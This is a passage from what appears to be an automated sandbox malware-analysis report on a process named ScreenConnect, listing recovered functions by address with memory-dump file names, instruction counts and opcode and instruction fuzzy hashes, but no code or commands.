Instruction Fuzzy Hash: 313189B1D002099FDB14DFA9D4446DEBFF4EF88320F10846AD419A7340DB78A945CBA4

Function 01CBE4F9 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01CBE534

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 3ccd681a3c439807cdf36214d87c887fad55b796d2a90ec4ea811a58b9caabaa
Instruction ID: ec16a304d30253d5ec4c22533066d5285b3e174787f355c3fe2c72a3079f9664
Opcode Fuzzy Hash: 3ccd681a3c439807cdf36214d87c887fad55b796d2a90ec4ea811a58b9caabaa
Instruction Fuzzy Hash: 1E21A771B00114DBDB189B66C998BEE7BB6BBC8710F18442DF106E7290EE71DC45CB55

Function 01CBF2CC Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

#i, xrefs: 01CBF89F

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: #i
API String ID: 0-3407789154
Opcode ID: 23410379e955e7c39d96ec09ac06d4f556915d2353064b0ccea3a2b7da78ed2f
Instruction ID: 84c6dc7daf71dcbd279f85e8878552aec0943c066c4eb6236af5605a6a3e8f96
Opcode Fuzzy Hash: 23410379e955e7c39d96ec09ac06d4f556915d2353064b0ccea3a2b7da78ed2f
Instruction Fuzzy Hash: FC2114B6800259EFDB10CF9AD844ADEBBB5FB88310F14842AE954A7211C379A655CFA1

Function 01CB4E44 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

#i, xrefs: 01CB5377

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: #i
API String ID: 0-3407789154
Opcode ID: 29c3262437a99b0d156e980bb50bbd1e2256ef4b9f827cc49755aa397ae39e13
Instruction ID: 9fba666e48c1e155b00e6f509d114ac94296153cf35fb618582008f9d8a1ded5
Opcode Fuzzy Hash: 29c3262437a99b0d156e980bb50bbd1e2256ef4b9f827cc49755aa397ae39e13
Instruction Fuzzy Hash: ED2122B5C00219DFDB10CF9AC484AEEFBF4EB48324F10842AD918A7340D3B8A545CFA5

Function 01CB5400 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

$^q, xrefs: 01CB5425

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: df3f67c3e31879985d3e1610af15fe312cc0fde28128966e6c532564629f7342
Instruction ID: 158bfc23635a9ae03de174483fdeb489d21feb630b63bc42f3ff1c42b6be6f92
Opcode Fuzzy Hash: df3f67c3e31879985d3e1610af15fe312cc0fde28128966e6c532564629f7342
Instruction Fuzzy Hash: E9E08C70609350CFD716DF2CE9919927BF4BF12A02B5609FAEA84CB672C725CC51CA62

Function 01CBD078 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e33ccfaca6d32b7f8c7142dc0b74a2d0d7fc84e89c8b3bc0ce442983322206
Instruction ID: 13fa11e03d5ea707102c904f1169d2b702499bfd673f011892b7c324e083f00f
Opcode Fuzzy Hash: 45e33ccfaca6d32b7f8c7142dc0b74a2d0d7fc84e89c8b3bc0ce442983322206
Instruction Fuzzy Hash: 26A12374A00209CFDB14DBA9C694AADBBF2EF88314F1581A9E406EB364DB35ED41CF50

Function 01CBD069 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe85fe217ea64ea064017a62e740d79bd147fafe619a0a3c2e3cff0d20a62d9
Instruction ID: afa5cdffd86e4a642df88b647dadd8098cce2f0565ab53f61faea6bb4cf105f9
Opcode Fuzzy Hash: fbe85fe217ea64ea064017a62e740d79bd147fafe619a0a3c2e3cff0d20a62d9
Instruction Fuzzy Hash: 4DA13674A40205CFDB14DBA8C694AADBBF2EF88314F1581A9E406EB364DB35ED42CF50

Function 01CB8808 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95499ac205d3400997edd2027cd10739bccacbae5f3bd5eaccacbbb0297cc4c4
Instruction ID: 6439bf4cc829386fe2c7a488a4ba23ccba9a44f9f04e3d9be89ba51d82dab7cb
Opcode Fuzzy Hash: 95499ac205d3400997edd2027cd10739bccacbae5f3bd5eaccacbbb0297cc4c4
Instruction Fuzzy Hash: B0619230A00245CFCB04DF78C48479EBBB6AF89710F148595D415AF395DB75ED85CBA1

Function 01CBE308 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ca06e798a9ec65791054768c0c81af0780277c9840ca084381a3805aa3519c
Instruction ID: f6728738dd826a05f0506ca1bb407b76e61dca09ae986b4ed9e6a5beacce1f13
Opcode Fuzzy Hash: 50ca06e798a9ec65791054768c0c81af0780277c9840ca084381a3805aa3519c
Instruction Fuzzy Hash: 72519034700201CFDB14DF6CC5949AAF7E6FF88304B158569E50ADB366EB78EC028B90

Function 01CBE318 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5fe52ebe7b0bf88e9ece1390b4547d9baa8fb7ee6990caaf3ec69eda5981f14
Instruction ID: 9d1272a6341d575d6a4c90c083838937cf948a537bc7ced810e06508d2bc3683
Opcode Fuzzy Hash: b5fe52ebe7b0bf88e9ece1390b4547d9baa8fb7ee6990caaf3ec69eda5981f14
Instruction Fuzzy Hash: 5F517E34700206CFDB14DFADC9949AAF7E6FF88304B148569E54ADB365EB74EC018B90

Function 01CB84A0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac47ae1c016468906923d4684b476d3a7513d1c2d4dbc986f1a56eee1f9b3439
Instruction ID: 7838a4e77f77f42b7b4f1a5c683d9aba8abe1417b59bfff6150bd4e7e71abd86
Opcode Fuzzy Hash: ac47ae1c016468906923d4684b476d3a7513d1c2d4dbc986f1a56eee1f9b3439
Instruction Fuzzy Hash: D9511634600A01CFD724DF2AD984A96B7F6FF8D324B245A58E496DB7A4DB31F906CB40

Function 01CBB2D0 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b27934a6c00c2f0337d9af85348b4b2571547af505856d8f3cd3dfbc08454132
Instruction ID: fb5dc918426eb135505d7761eb0c8abd3400f533a07348398cd2259ba3f084c0
Opcode Fuzzy Hash: b27934a6c00c2f0337d9af85348b4b2571547af505856d8f3cd3dfbc08454132
Instruction Fuzzy Hash: 2D516930E403498FDB01EFB8D944B9DBBB1FF88300F148599E514AB3A5DB75A989CB94

Function 01CBB2C0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93db3a660c656b3f454c45c57e24bfa01c0d618925320129922d990c1d8f7c7a
Instruction ID: e941738e37d70721e0c8827efe237f33c8c699f5f16eaf7470292b50a4895d82
Opcode Fuzzy Hash: 93db3a660c656b3f454c45c57e24bfa01c0d618925320129922d990c1d8f7c7a
Instruction Fuzzy Hash: B2515C70E402098FDB05DFA8D844BDDBBB2FF88300F218559E114BB364DB75A986CB54

Function 01CBEF67 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc7f28dc9753f10b1818559e26be8f442549af663ec99de8d34b9b7e0525b371
Instruction ID: 8a6c5e93d998a88acb850b4b6aa34ea20a39c3662ba0b9fd5d13539fb7a6ee9c
Opcode Fuzzy Hash: dc7f28dc9753f10b1818559e26be8f442549af663ec99de8d34b9b7e0525b371
Instruction Fuzzy Hash: 57414F71E0020ADBEB15DFA9C8D0ADEBBB5EF89700F148529E505B7350DB70AE46CB91

Function 01CB9978 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 505baa9e2c0b52fc681c031844ae4f38b3b621d53ff8e261f7782591bc823e4f
Instruction ID: 91c0391edcf24356c1ec9c78fd9f7ce6d6815d6e6d00b6ff25c47565b69f019a
Opcode Fuzzy Hash: 505baa9e2c0b52fc681c031844ae4f38b3b621d53ff8e261f7782591bc823e4f
Instruction Fuzzy Hash: 26415B707102158FCB18EB79D894AAEBBF6BF88614F144569E516EB3A0DF30ED05CB90

Function 01CB9974 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873511434eb2d94ee445d241897a0a336a4edf3230e86d4fde3ec4b7125947ba
Instruction ID: daa3cc6ab7651a1a0266cda5ce54608e8aab019c2dd5e2c0e7ad96c4adf21f2a
Opcode Fuzzy Hash: 873511434eb2d94ee445d241897a0a336a4edf3230e86d4fde3ec4b7125947ba
Instruction Fuzzy Hash: 60418B70B102058FCB14DB79D894AADBBF6BF88610F144469E506EB3A0DF30DD05CB90

Function 01CB7920 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fef4d4dbb5d48caa18d7aac20eac93990bccec65104c80f8662db43c0bf0457b
Instruction ID: a41fdf352b66451ec98e13c2a5f1570b7c71d5fe0491bbb9eed1fb01d7a58651
Opcode Fuzzy Hash: fef4d4dbb5d48caa18d7aac20eac93990bccec65104c80f8662db43c0bf0457b
Instruction Fuzzy Hash: 84317031B00205CBEB149FA9C4946AEFBF6EFC9354F10A469E806E7794DB31ED008790

Function 01CBDC08 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92289a30a58039d50b15fb8929f082a9b1200e28f1d849fc01c4ae423eb4db7b
Instruction ID: af28abefdeda4f010834c902236a422d364f0ea06fe4027b2103a15847e7fd80
Opcode Fuzzy Hash: 92289a30a58039d50b15fb8929f082a9b1200e28f1d849fc01c4ae423eb4db7b
Instruction Fuzzy Hash: 18314A70600601CFD730DF69C8846A6BBF1EF85328F108A18E097DB6A5D370EA46CF90

Function 01CBEB3A Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe901972b320518dc99f9a6f3cfbd6bd4d828c61c91e9e347c95d3d99db97e3b
Instruction ID: d4f5d43dde1d6e5293af84ceaf5927e2556e20ec360a69a164fb7c37436b61c6
Opcode Fuzzy Hash: fe901972b320518dc99f9a6f3cfbd6bd4d828c61c91e9e347c95d3d99db97e3b
Instruction Fuzzy Hash: F621D0A19093C19FD302872898909D9BF21EF93224B1AC0DBE485CF6A3D629D947C766

Function 01CB36B0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01c2cb58794ddb0fc6da5b0b4a3cb547c16b6824f5b68015dd7deb9f64444ee
Instruction ID: f7c36195318124c5fc7c14a15d59dff7999498bb5c5870c1173a9cacdac6bbeb
Opcode Fuzzy Hash: f01c2cb58794ddb0fc6da5b0b4a3cb547c16b6824f5b68015dd7deb9f64444ee
Instruction Fuzzy Hash: 26313370A01245DFCF14DFB4D9881AEBBB4FF49314B1041A6D919EB291DB309E01CB61

Function 01CB6568 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14fa8de824b7e8dda7d2a607c7e5560bf199af2ad44b4d7e9e39e4517e92adc3
Instruction ID: 822fbb3df6b6800eaa97453b78975a5ca375e295c2e7f98579d3050fe2b55f61
Opcode Fuzzy Hash: 14fa8de824b7e8dda7d2a607c7e5560bf199af2ad44b4d7e9e39e4517e92adc3
Instruction Fuzzy Hash: F131F734600615CFD730DF2EC884AAABBF5EF89314B144A28D496DB7A5D730E94ACF90

Function 01CBDC18 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f599a2ff05cec9f66d722bd1e17968f87fa41d8bef0259300c10fe85d3e7cb95
Instruction ID: 5d0aa47110977e8edfe4eb63aae7e99e18601d905d3d6ff865fb5ce4b407a461
Opcode Fuzzy Hash: f599a2ff05cec9f66d722bd1e17968f87fa41d8bef0259300c10fe85d3e7cb95
Instruction Fuzzy Hash: 17310770600B05CFC730DF6AC8846A6BBF1EF49314F104A28E497DB6A5D770EA4A8F90

Function 01CB90A8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a35cd1f5ad7ab6d74bdb7acf3a36ccdcc3174a3bfbb6f6fc3599dc56b610acc
Instruction ID: 3a36cd9b909c817a88cd89618b52b70d17956946a332e5286dff13bb2641c276
Opcode Fuzzy Hash: 7a35cd1f5ad7ab6d74bdb7acf3a36ccdcc3174a3bfbb6f6fc3599dc56b610acc
Instruction Fuzzy Hash: 27317C70600701CFDB30DF69D888AAAB7F6EF89314B144A2CD596DB3A4D730E906CB91

Function 01CBDDC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e51e25ba29cf687632157aa69a67037958103c39158398a49da47530c5833937
Instruction ID: 0b5293f73c302f68d3b13aa76d2dfe9c596bb54ec4cdc2da1e83923b2f3d1c95
Opcode Fuzzy Hash: e51e25ba29cf687632157aa69a67037958103c39158398a49da47530c5833937
Instruction Fuzzy Hash: 32310A70600701CFD730DF6AC8846AAB7F1AF99324B104A29E566DB7A5D730E946CF90

Function 01CB36A0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdc0c886245754ab241838b2c2b56058b6bf3ed72d6c78caff667d5829fbd7b9
Instruction ID: b345648c48e0906ba0df4483acc1ac2af7f3d02c95c2a73655d1301bc54edbdd
Opcode Fuzzy Hash: cdc0c886245754ab241838b2c2b56058b6bf3ed72d6c78caff667d5829fbd7b9
Instruction Fuzzy Hash: 1E2133B2A00251CFCB259FB8D9C81EEBBB0FF45715B104169C41AD7285EB31DD06CB51

Function 01B7D688 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998353787.0000000001B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1b7d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f457cb686d3f176e9121197aa17b53ddac0dc5a222794f6e1dcd72285e1f0c
Instruction ID: 0f75ba3b15df6557507844f0c0e8f49baa88fc147b8367ef055c1deb8732778a
Opcode Fuzzy Hash: 41f457cb686d3f176e9121197aa17b53ddac0dc5a222794f6e1dcd72285e1f0c
Instruction Fuzzy Hash: 60214571100280DFCB09DF58DAC4B26FF65FF98354F20C2A9E8090B256C336D456CBA1

Function 01CB8C20 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70bf84717b7b6b2d16390c4375b2a1a417de2ca0fb7af33a583e3366d35e38d
Instruction ID: 0309b2ba168dc158e304e0199522f429ade6a6f86ef6341547d21c4bc755ca4a
Opcode Fuzzy Hash: e70bf84717b7b6b2d16390c4375b2a1a417de2ca0fb7af33a583e3366d35e38d
Instruction Fuzzy Hash: 5421F0716012019FEB05E738D9907BEBBA2EBC5200F14856AD405EB3A4DB70AD058792

Function 01CBE198 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce987d2746e6cefd767650d925fe13604a73dde7e6fc30f0486f9b5d934e4bbc
Instruction ID: 0a4257f5228bc4fa91253d4c31d03271a26b2806096cf96d9ba1f45b3ae4b094
Opcode Fuzzy Hash: ce987d2746e6cefd767650d925fe13604a73dde7e6fc30f0486f9b5d934e4bbc
Instruction Fuzzy Hash: C2218171A002059FDB05DB68D881AEEBBF1FF89314B10856AE519EB325DB34ED068B90

Function 01CBE168 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2e09aa1f8afc59630172946a75e71b2c7475e984387208a3f4162e28aaf3a5
Instruction ID: 004137f59e6333c65e1d772e5a76ee97797fdaf8fa01e5a550ce4747b5d45778
Opcode Fuzzy Hash: 5f2e09aa1f8afc59630172946a75e71b2c7475e984387208a3f4162e28aaf3a5
Instruction Fuzzy Hash: DC21CF707002058FDB05DBA8D8819EEBBF1FF89314B10816AE509EB375DB30ED058B80

Function 01CB86D0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3827ca8d0cae4e1bf0e29afd5b8ccda1cbdf8671505774f46894c8ca480c5e
Instruction ID: f35e76b654842d66ae399331522bd6c9321769542d4c7ec18e32a2f8c26b344c
Opcode Fuzzy Hash: 2c3827ca8d0cae4e1bf0e29afd5b8ccda1cbdf8671505774f46894c8ca480c5e
Instruction Fuzzy Hash: 6D214F30100605CFD734DF2AC948596BBF5EF48314F108A2CE493976A5DB31E95ACF90

Function 01CBA7B0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d010db94f1f5a12a9a074a09ad860665c7d563856ad89cff1ce1ef902ead41
Instruction ID: f8af684b4c1a1b13123f8b4c79c76a415cf31aa86c06d0f61189a82c5e3bb551
Opcode Fuzzy Hash: 86d010db94f1f5a12a9a074a09ad860665c7d563856ad89cff1ce1ef902ead41
Instruction Fuzzy Hash: D221EC70A00705CFD724DF29D584AAABBF5BF48310B108A2DE5A6C76A4DB75E906CB80

Function 01CB8C30 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e105a369bdbd79204ceb24372bf1539dc584fb0d947275ecd3a9c9b89bcda3d0
Instruction ID: c44b3b69fd755592b162c380a6f9007caae2ade8d3c2f09f2a55eea7de2e8b68
Opcode Fuzzy Hash: e105a369bdbd79204ceb24372bf1539dc584fb0d947275ecd3a9c9b89bcda3d0
Instruction Fuzzy Hash: C711D0357012159BEB04EB29D9417BEB7E6EBC8200F148529D415AB3E4DF70BD0587E1

Function 01CBA9A1 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229308e4460542d5fdd3ac2bb157b759124cf5391970a6c0f7858b21cc9c01cb
Instruction ID: 71a7bdc8e7f69b34ded5a0be4f4c152da42943356b6c7c01dffc27d849e4f11d
Opcode Fuzzy Hash: 229308e4460542d5fdd3ac2bb157b759124cf5391970a6c0f7858b21cc9c01cb
Instruction Fuzzy Hash: 03110272A093925FCB17473958600DABFB4EB8625470A46EBC189DB253EA69CD0B87D0

Function 01CBE1A8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 490b3fa1744b7eb6a6b1ef8f1202f10794b6f98820c43fe02ca81053b6877935
Instruction ID: 62b7644738f2cefcf8454f2dc8014e6401257233f2726a6f1e8085ead61d4a2c
Opcode Fuzzy Hash: 490b3fa1744b7eb6a6b1ef8f1202f10794b6f98820c43fe02ca81053b6877935
Instruction Fuzzy Hash: 01115170B002099FDF05DB68DD81AAEBBF5FF88314B10856AE519EB364DB30ED058B90

Function 01CBED74 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65272b793821f77b359add32491f6e2effbbc570f155fbcc1145b32fbf3176d9
Instruction ID: 093e1d408a540961e3292f2ea3102d65ef312e19deb0810de68e7bcbb724f34a
Opcode Fuzzy Hash: 65272b793821f77b359add32491f6e2effbbc570f155fbcc1145b32fbf3176d9
Instruction Fuzzy Hash: 24211A32D1070A99CB10EFB9D8505EAF7B0EF99210F10C62AE559B7110FB70A295C781

Function 01CB0E84 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfb756d4369f937804ed739877a60fff25e6617138ca9c7324fc4c3567334982
Instruction ID: fbb723c64c2c79a7d18f321764c567c56a4ce780659194fbcb40df97fc7b5e8f
Opcode Fuzzy Hash: cfb756d4369f937804ed739877a60fff25e6617138ca9c7324fc4c3567334982
Instruction Fuzzy Hash: B001C0A6A1E2E0CBDB122A3E11E41DB3FB0D996955F0404E7F0D1CF167E515C9A7C391

Function 01CB8AA0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e124969b0b910d43121e1074903be8c2fb813230bd3b130849bcb20f17582d
Instruction ID: 5460af70297bf83a06b4366751d12892508edd71febbabd4a5dcb68b4eff5e4f
Opcode Fuzzy Hash: c3e124969b0b910d43121e1074903be8c2fb813230bd3b130849bcb20f17582d
Instruction Fuzzy Hash: 8E11337590120A9FCF01DFA8C9405DEBBF5EF49304B158166E905FB261D735AE0ACB91

Function 01CB91A8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

